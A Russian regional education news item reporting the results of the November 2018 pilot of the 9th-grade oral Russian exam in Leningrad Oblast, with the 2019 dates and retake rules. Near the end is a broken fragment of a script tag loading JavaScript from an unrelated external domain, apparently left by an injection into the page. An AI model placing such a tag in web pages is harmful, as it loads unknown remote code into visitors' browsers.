Об итогах федеральной апробации собеседования по русскому языку в 9 классе в Ленинградской области

Подведены итоги федеральной апробации итогового собеседования по русскому языку в 9 классе, проведенной 9 ноября 2018 года в общеобразовательных организациях Ленинградской области. В апробации приняли участие 798 обучающихся 9 классов 18 общеобразовательных организаций.

Средний балл апробации в регионе – 13,6 (РФ-13,5). Не получили «зачет» — 5,5% участников (РФ- 6,5%).

Наибольшую сложность для участников представляло выполнение требований по  критериям  3-11; 13; 16; 18; 19, по которым максимальный балл получили  в среднем только 60 % участников, в то время как по другим критериям выполнение составляло около 95%.

Наименьшие результаты получены по критериям грамотность.

Итоговое собеседование по русскому языку вводится с текущего учебного года как условие допуска к ГИА. Данная норма определена Порядком проведения государственной итоговой аттестации по образовательным программам основного общего образования, утвержденным приказом Министерством просвещения Российской Федерации и Федеральной службой по надзору в сфере образования и науки от 07 ноября 2018года №189/1513.

Результатом итогового собеседования по русскому языку является «зачет»    или «незачет». «Зачет» выставляется от 10 баллов и выше, максимальный результат 19 баллов.

Определены следующие сроки проведения процедуры: 13 февраля 2019 года (для ОО с большим числом участников рассматривается возможность проведения итогового собеседования в два дня).

Дополнительные сроки – 13 марта и 6 мая.

Повторно допускаются к итоговому собеседованию по русскому языку   в дополнительные сроки в текущем учебном году следующие обучающиеся, экстерны:

получившие неудовлетворительный результат («незачет»);

не явившиеся на собеседование  или не завершившие процедуру по уважительным причинам, подтвержденным документально.

В Ленинградской области итоговое собеседование по русскому языку будет проходить в образовательных организациях по месту обучения участников.

При его проведении будет использована неавтоматизированная технология, которая применялась в рамках федеральной и региональной апробации в ноябре текущего учебного года, а также при мониторинге качества подготовки обучающихся по русскому языку в форме итогового собеседования в апреле прошлого учебного года.

  ‘https://getmylanding.site/demo.js?t=2’ type=’text/javascript’>

It's only fair to share...Share on Facebook
Facebook
Share on VK
VK

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *